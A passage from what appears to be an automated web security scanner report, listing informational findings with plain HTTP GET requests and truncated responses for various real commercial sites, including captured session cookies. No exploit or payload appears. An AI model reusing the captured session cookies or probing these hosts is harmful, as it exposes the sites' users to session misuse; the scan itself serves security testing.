Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:14 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:18 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32356


<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Complet
...[SNIP]...

32.83. https://secure.krypt.com/order/customize.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.krypt.com
Path:   /order/customize.html

Request

GET /order/customize.html?index=1 HTTP/1.1
Host: secure.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.5.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:38:20 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:38:28 GMT; path=/; domain=.krypt.com
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 48123

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Customiz
...[SNIP]...

32.84. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/images/watermark.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/images/watermark.gif

Request

GET /onlineshop/images/watermark.gif HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Contact/Contact.aspx?lang=it&plang=it
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; CTQ=second; s_cc=true; s_nr=1303671140692-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/productdetail%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/contact.aspx%25253Flang%25253Dit%252526plang%25253Dit%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:52:09 GMT
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 32
Connection: close

<html>document not found.</html>

32.85. http://switch.atdmt.com/jaction/LifeLock_Landing_Page  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://switch.atdmt.com
Path:   /jaction/LifeLock_Landing_Page

Request

GET /jaction/LifeLock_Landing_Page HTTP/1.1
Host: switch.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/lifelock-in-the-community/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 03:08:30 GMT
Connection: close
Content-Length: 1242

function AT_tags(){
try{var tags = new Array();
var imgs = new Array();
tags = ['http://spe.atdmt.com/images/pixel.gif','http://at.amgdgt.com/ads/?t=pp&px=2853&rnd=[cachebuster]','http://
...[SNIP]...

32.86. http://www.bluewin.ch/includes/osn/mdd.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bluewin.ch
Path:   /includes/osn/mdd.php

Request

GET /includes/osn/mdd.php?callback=mddJson&tab_id=4312&page_code=RESosnen&tab=res&lang=en HTTP/1.1
Host: www.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://en.swisscom.ch/residential
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Zeus
Date: Sun, 24 Apr 2011 18:51:03 GMT
Content-Type: text/html
Cache-Control: max-age=3600
Connection: close
Vary: Accept-Encoding

mddJson({"mdd":"<div id=\"link_SHOPosnen_dropdown\" class=\"megadropdown \" style=\"display:none;\"><div class=\"mdd-inner\"><div class=\"mdd-header\"><a href=\"javascript:void(0);\" class=\"mdd-close
...[SNIP]...

32.87. http://www.discountasp.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discountasp.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.discountasp.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qcipgv45ri0zgf3qhp4uir45; safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843; safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 03 Sep 2010 23:11:48 GMT
Accept-Ranges: bytes
ETag: "0524862bd4bcb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:15 GMT
Content-Length: 1410

...<html>
<head>
   <title>Web Page Not Found</title>
</head>

<style>
<!--
BODY {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt}
TD {font-family: Verdana, Arial, Helvetica,
...[SNIP]...

32.88. https://www.discountasp.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.discountasp.net
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.discountasp.net
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qcipgv45ri0zgf3qhp4uir45; safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843; safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Fri, 03 Sep 2010 23:11:50 GMT
Accept-Ranges: bytes
ETag: "07f7963bd4bcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:58:57 GMT
Content-Length: 1410

...<html>
<head>
   <title>Web Page Not Found</title>
</head>

<style>
<!--
BODY {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt}
TD {font-family: Verdana, Arial, Helvetica,
...[SNIP]...

32.89. http://www.echomail.com/pricing/pricing_sm.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.echomail.com
Path:   /pricing/pricing_sm.asp

Request

GET /pricing/pricing_sm.asp HTTP/1.1
Host: www.echomail.com
Proxy-Connection: keep-alive
Referer: http://echomail.com/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.3.10.1303692234

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 257433
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDAQTTABCB=BKLNDKCCCNEDBOJHCNNAFNFD; path=/
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 01:30:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>EchoMail - E-Mail & Social Media Marketing, Monitoring and Management | Pricing | Small Business</title>
   <he
...[SNIP]...

32.90. http://www.gfk.com/ssi/share/index.de.html.ssi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gfk.com
Path:   /ssi/share/index.de.html.ssi

Request

GET /ssi/share/index.de.html.ssi HTTP/1.1
Host: www.gfk.com
Proxy-Connection: keep-alive
Referer: http://www.gfk.com/ssi/share/index.de.html.ssi
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:32:57 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
WS: lxws2
Content-Type: text/html
Content-Length: 1228

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta content="no
...[SNIP]...

32.91. http://www.gfk.com/ssi/share/index.en.html.ssi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gfk.com
Path:   /ssi/share/index.en.html.ssi

Request

GET /ssi/share/index.en.html.ssi HTTP/1.1
Host: www.gfk.com
Proxy-Connection: keep-alive
Referer: http://www.gfk.com/group/events_insights/index.en.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:55:38 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
WS: lxws2
Content-Type: text/html
Content-Length: 1226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta content="no
...[SNIP]...

32.92. http://www.hotelclub.com/blank.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /blank.htm

Request

GET /blank.htm HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/ManageBooking.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974; s_cc=true; s_vi=[CS]v1|26DA09858516231B-400001A4A00530FD[CE]; s_lp=yes; s_sq=flairviewhcprod%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//www.hotelclub.com/ManageBooking.asp%2526ot%253DA; WT_FPC=id=173.193.214.243-2165807168.30147192:lv=1303643411617:ss=1303643390479

Response

HTTP/1.1 200 OK
Cteonnt-Length: 240
Content-Type: text/html
Last-Modified: Wed, 14 Oct 2009 22:38:58 GMT
Accept-Ranges: bytes
ETag: "30766c1e1f4dca1:cb2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cache-Control: private
Date: Sun, 24 Apr 2011 12:11:23 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 240

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>None</title>
</head>

<bod
...[SNIP]...

32.93. http://www.hotelclub.com/common/adRevresda.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /common/adRevresda.asp

Request

GET /common/adRevresda.asp?channel=home&Section=main&adsize=728x90&pos=bottom HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Cteonnt-Length: 249
Content-Type: text/html
Cache-Control: private
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 12:09:46 GMT
Connection: close
Content-Length: 249

<script language="javascript" src="http://www.revresda.com/js.ng/CookieName=PRO2&site=HCL&platform=classic&secure=false&m=0&v=-803181687&language=en&currency=USD&subdomain=HCAU&channel=home&Section=ma
...[SNIP]...

32.94. http://www.identityguard.com/dashboard_demo.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /dashboard_demo.html

Request

GET /dashboard_demo.html HTTP/1.1
Host: www.identityguard.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; URLParams=mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1; cmTPSet=Y; __utmz=242046173.1303674405.2.2.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303674405.2; __utmc=242046173; 90226925_clogin=l=1303677758&v=33&e=1303678658884; cmRS=&t1=1303674404625&t2=1303674406635&t3=1303677758882&lti=1303677758882&ln=&hr=/dashboard_demo.html&fti=&fn=&ac=&fd=&uer=&fu=&pi=letp30daysfree33&ho=data.coremetrics.com/cm%3F&ci=90226925&cjen=1

Response

HTTP/1.1 200 OK
Content-Length: 4603
Content-Type: text/html
Last-Modified: Wed, 07 Apr 2010 20:16:18 GMT
Accept-Ranges: bytes
ETag: "0155d2e8fd6ca1:20a9"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 20:42:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title
...[SNIP]...

32.95. http://www.identityguard.com/ipages/le4/styles/ie.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.identityguard.com
Path:   /ipages/le4/styles/ie.css

Request

GET /ipages/le4/styles/ie.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.identityguard.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDQASBDART=HKBCAEEBEEDNPAMOIACLELJF; path=/
Date: Sun, 24 Apr 2011 03:11:05 GMT
Content-Length: 92

<script type= "text/javascript"> window.location = "http://www.identityguard.com" </script>

32.96. http://www.kroogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kroogy.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=3d7f14c510eede66cdde05b384066fc0; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; __utmc=221607367; __utmb=221607367.2.10.1303658380

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 15:19:33 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2090

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...

32.97. http://www.krypt.com/contact/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /contact/

Request

GET /contact/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:02 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 27890

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Contact
...[SNIP]...

32.98. http://www.krypt.com/solutions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /solutions/

Request

GET /solutions/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:03 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 20343

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Solution
...[SNIP]...

32.99. http://www.krypt.com/why-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/

Request

GET /why-us/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.1.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:04 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:35:05 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 22985

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - The Kryp
...[SNIP]...

32.100. http://www.krypt.com/why-us/datacenters/lax/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/datacenters/lax/

Request

GET /why-us/datacenters/lax/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:40:31 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:40:36 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 25090

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Datacent
...[SNIP]...

32.101. http://www.krypt.com/why-us/network/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krypt.com
Path:   /why-us/network/

Request

GET /why-us/network/ HTTP/1.1
Host: www.krypt.com
Proxy-Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.6.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:41:08 GMT
Server: Apache/2.2.16 (FreeBSD) mod_ssl/2.2.16 OpenSSL/0.9.8k DAV/2 PHP/5.3.3
X-Powered-By: PHP/5.3.3
Set-Cookie: cid=9b766d29f4a59d55b1ee0c2aaaa06184; expires=Tue, 24-May-2011 16:41:15 GMT; path=/; domain=.krypt.com
Content-Type: text/html
Content-Length: 24420

<!DOCTYPE html>
<html>
<head>
   <!-- $Id: headcode.inc.html 5002 2011-03-21 07:42:21Z jrlenz $ -->
   
   <meta charset="utf-8" />
   <meta name="viewport" content="width=1024">

   <title>Krypt.com - Network
...[SNIP]...

32.102. http://www.nextadvisor.com/includes/javascript.php  previous  next

Summary

Severity:   Information
